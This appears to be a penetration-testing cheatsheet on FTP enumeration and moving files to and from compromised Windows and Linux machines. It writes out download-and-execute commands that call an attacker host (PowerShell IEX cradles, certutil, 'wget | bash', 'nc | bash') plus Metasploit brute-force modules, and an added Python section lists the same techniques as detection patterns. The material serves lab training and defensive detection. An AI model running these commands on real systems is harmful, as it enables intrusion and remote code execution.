Enumeration Cheatsheets

# Enumerating FTP for Pentesting (Port 21)

## Basic Enumeration

Attempt to connect anonymously by issuing the command below and, when prompted, supplying the credentials anonymous:anonymous.

ftp <ipAddress>

You can perform banner grabbing with the following Metasploit module.

use auxiliary/scanner/ftp/ftp_version

You can perform brute force with the following Metasploit module.

use auxiliary/scanner/ftp/ftp_login

## Transferring Files

If you have valid credentials, you can use the following command to download all files recursively.

wget --mirror 'ftp://<username>:<password>@<ipAddress>'

Tips & Tricks

# Windows File Transfer Cheatsheet

Wanted to provide a single place to go for all file upload/download techniques when attacking a Windows machine from Kali Linux. This will be updated as I come across new ones and/or the next time I need to use them.

### Python Web Server

The following will start a web server in the present working directory using Python 2.
python -m SimpleHTTPServer 80

The following will start a web server in the present working directory using Python 3.
python3 -m http.server 80

### Impacket SMB Server

We’ll need to perform a few steps to set this up, but it’s a great way to transfer files to/from a system. To begin, let’s create a directory called smb on our attacking system. Files in this directory will be available on the other end, and likewise, the other end will be able to place files into this directory.
mkdir smb
impacket-smbserver <sharename> <path>

Then we can mount this file share in PowerShell from the other side.
New-PSDrive -Name "<ShareName>" -PSProvider "FileSystem" -Root "\\<attackerIP>\<ShareName>"

And change into the new drive.
cd <ShareName>:

On our Kali machine, we’ll start our Impacket server while in the directory we wish to host.
sudo impacket-smbserver <shareName> $(pwd) -smb2support -user <user> -p <password>

Then on the Windows machine, we’ll connect back to this SMB share, but we’ll need to specify the credentials mentioned in the above command. To do that, we’ll use the following commands:
$pass = ConvertTo-SecureString '<password>' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('<user>',$pass)
New-PSDrive -Name "<ShareName>" -PSProvider "FileSystem" -Root "\\<attackerIP>\<ShareName>" -Credential $cred

## Downloading Files

### PowerShell

The following will download and store a remote file to disk.
Invoke-WebRequest -Uri "http://attackerIP/file.exe" -OutFile "C:\path\to\file.exe"

The following will download and automatically execute the remote PowerShell script when run from a command prompt.
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('http://attackerIP/file.ps1')"

An alternative to the above is to use Invoke-WebRequest in a different manner.
powershell.exe "IEX (IWR http://attackerIP/file.ps1 -UseBasicParsing)"

### CertUtil

The following will download and store a remote file to disk.
certutil.exe -urlcache -f "http://attackerIP/file.exe" file.exe

### Windows Defender

The following will download and store a remote file to disk.
MpCmdRun.exe -DownloadFile -url [url] -path [path_to_save_file]

## Transferring with SSH

To copy a file from B to A while logged into B:
scp /path/to/file username@a:/path/to/destination

To copy a file from B to A while logged into A:
scp username@b:/path/to/file /path/to/destination

## Transferring via Base64 Encoding

From within a PowerShell session, you may want to encode the file into Base64 format so you can just copy it down to your destination machine and decode it on the other side. This is handy for transferring small files. Within PowerShell, you can encode a file by running:
$fileContents = Get-Content "filename.txt" -Raw
$fileEncode = [System.Text.Encoding]::UTF8.GetBytes($fileContents)
[System.Convert]::ToBase64String($fileEncode)

Then, within Kali, you can decode it using the following:
echo -n <base64String> | base64 -d > filename.txt

This should create the file for you to interact with.


These examples show uploading LinEnum.sh to a victim machine and executing it straight from memory, so that nothing is written to the hard drive.

## Method A: Using Netcat

On our attacking box, find the executable you wish to transfer and run the following command:

cat <filename> | nc -nvlp 9002

On the victim machine, change into the following directory (a memory-backed tmpfs), so that anything accidentally written ends up in memory rather than on disk.

cd /dev/shm

Then transfer and execute the file by connecting back to your netcat connection.

nc 10.10.14.57 9002 | bash

## Method B: Using Wget

Host up the file using a Python web server from your Kali machine:
sudo python3 -m http.server

And then run the following command from the victim to download and execute straight into memory.
wget -O - <attackerIP>/<fileName> | bash
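As an added example that is not part of the original cheatsheet, the following Python flags process command lines matching the download-and-execute patterns listed above (certutil, MpCmdRun, the IEX cradles, and the wget/netcat pipes into bash), the way a defender reviewing process-creation telemetry would. The log lines and the 203.0.113.10 address are constructed; the rule names are my own.

```python
# Added example (not from the original cheatsheet): flag process command lines that
# match the download-and-execute patterns this page catalogs, as a defender would
# when reviewing Sysmon/auditd process-creation logs. Sample log lines are constructed.
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Rule:
    name: str
    pattern: re.Pattern


# Each rule mirrors one technique listed on this page; Windows rules are case-insensitive.
RULES = [
    Rule("certutil urlcache download",
         re.compile(r"certutil(\.exe)?\s+.*-urlcache\b.*-f\b", re.I)),
    Rule("MpCmdRun download",
         re.compile(r"mpcmdrun(\.exe)?\s+.*-downloadfile\b", re.I)),
    Rule("PowerShell DownloadString cradle",
         re.compile(r"\biex\b.*net\.webclient.*downloadstring\(", re.I)),
    Rule("PowerShell IWR cradle",
         re.compile(r"\biex\b.*\b(iwr|invoke-webrequest)\b", re.I)),
    Rule("wget to stdout piped to shell",
         re.compile(r"\bwget\b.*-O\s*-\s.*\|\s*(ba)?sh\b")),
    Rule("netcat piped to shell",
         re.compile(r"\bnc\b.*\d+\s*\|\s*(ba)?sh\b")),
]


def classify(cmdline: str) -> list[str]:
    """Return the names of every rule the command line matches (empty if benign)."""
    return [r.name for r in RULES if r.pattern.search(cmdline)]


def scan(lines):
    """Yield (line, [rule names]) for each line that matches at least one rule."""
    for line in lines:
        hits = classify(line)
        if hits:
            yield line, hits


# Constructed sample process-creation records (not real telemetry).
SAMPLE_LOG = [
    'certutil.exe -urlcache -f "http://203.0.113.10/file.exe" file.exe',
    'powershell.exe "IEX (New-Object Net.WebClient).DownloadString(\'http://203.0.113.10/file.ps1\')"',
    'powershell.exe "IEX (IWR http://203.0.113.10/file.ps1 -UseBasicParsing)"',
    'MpCmdRun.exe -DownloadFile -url http://203.0.113.10/a.exe -path C:\\Users\\Public\\a.exe',
    'wget -O - 203.0.113.10/LinEnum.sh | bash',
    'nc 203.0.113.10 9002 | bash',
    'certutil.exe -hashfile C:\\Windows\\notepad.exe SHA256',  # benign certutil use
    'wget -O report.pdf https://example.com/report.pdf',       # benign wget: saves to a file
]

if __name__ == "__main__":
    for line, hits in scan(SAMPLE_LOG):
        print(f"[ALERT] {', '.join(hits)}: {line}")
```

The two benign lines at the end show the distinction the rules rely on: certutil and wget are flagged only in their fetch-to-disk-or-stdout forms that this page describes, not for ordinary use.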


# Transferring Files via Base64

Depending on the size of the file, you may not want to go through the hassle of transferring it via Netcat, FTP, or some other file transfer method.

In some cases, you can convert a file to Base64 code, and then simply copy/paste the code between the machines.

We’ll do that here. There is a file named viewuser on our victim box that we want to copy to our Kali attacking machine. I already have an SSH connection to the victim box. Let’s start by converting the file to Base64.

base64 -w0 /usr/bin/viewuser

Note: -w0 gets rid of line wrapping.

We’ll highlight the code and then Copy Selection.

With that in our clipboard, head over to your Kali machine and let’s create a file called viewuser.b64

gedit viewuser.b64

Paste the code and Save the file.

Now just run the following command to decode the contents and dump it into a new file.

base64 -d viewuser.b64 > viewuser

That’s it! You’ve successfully transferred the file between machines.